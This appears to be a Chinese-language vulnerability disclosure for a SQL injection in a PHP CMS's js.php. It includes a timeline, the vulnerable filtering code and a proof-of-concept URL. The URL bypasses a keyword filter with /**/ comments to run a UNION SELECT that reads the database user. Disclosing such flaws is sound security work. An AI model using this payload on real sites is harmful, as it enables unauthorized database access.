2012-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2012-08-25: 厂商已经主动忽略漏洞,细节向公众公开
SQL 注入
$pattern_arr = $replace_arr = array();if(!defined('IN_ADMIN')) { $pattern_arr = array( "/ union /i", "/\/\*\s?\*\/union\/\*\s?\*\//i", "/ select /i", "/\/\*\s?\*\/select\/\*\s?\*\//i", "/ update /i", "/\/\*\s?\*\/update\/\*\s?\*\//i", "/ from /i","/\/\*\s?\*\/from\/\*\s?\*\//i", "/ or /i","/\/\*\s?\*\/or\/\*\s?\*\//i", "/ and /i","/\/\*\s?\*\/and\/\*\s?\*\//i", "/ outfile /i", "/\(\s?select\s+/i", ); $replace_arr = array( ' union ', '/∗∗/union/∗∗/', ' select ', '/∗∗/select/∗∗/', ' update ', '/∗∗/update/∗∗/', ' from ', '/∗∗/from/∗∗/', ' outfile ', ' or ', '/∗∗/or/∗∗/', ' and ', '/∗∗/and/∗∗/', '* from ', '(select ', ); $_POST = strip_sql($_POST); $_GET = strip_sql($_GET); $_COOKIE = strip_sql($_COOKIE); unset($pattern_arr, $replace_arr);}define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());if(!MAGIC_QUOTES_GPC) { $_POST = add_slashes($_POST); //调用addslashes 转义 $_GET = add_slashes($_GET); $_COOKIE = add_slashes($_COOKIE); $_FILES && $_FILES = add_slashes($_FILES);}if(!empty($_POST)) extract($_POST, EXTR_SKIP); if(!empty($_GET)) extract($_GET, EXTR_SKIP);$sort = $jssort=='shop' ? (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0) : (isset($sort) && $sort > 0 && $sort <= 3 ? $sort : 0); $num = isset($num) && intval(trim($num)) >= 1 ? intval(trim($num)) : 10; $intercept = isset($intercept) && $intercept > 0 ? intval($intercept) : 0; $openwindow = isset($openwindow) && $openwindow > 0 ? 1 : 0; $pcdname = isset($pcdname) && $pcdname > 0 ? 1 : 0; if(!$sort) { exit("document.write(\"未选择显示类型。\");"); } $cachename = 'js_'.md5($jssort.$panels.$sort.$num); $cachefile = MUDDER_CACHEDIR.'cache_'.$cachename.'.php'; $where = ''; if((@!include($cachefile)) || $timestamp - $_createtime_js > $cachelife) { $panels = $panels ? explode('_', $panels) : ''; if($panels && is_array($panels)) foreach($panels as $panel) { $where .= ($where ? " OR " : " ")."classcode like '{$panel}__'"; }
注入有木有?
http://localhost/sa/js.php?jssort=shop&sort=1&num=2&panels=_sb_fack_a'+and/**/1=2/**/union select+1,user(),3,4,5%23
过滤
未能联系到厂商或者厂商积极拒绝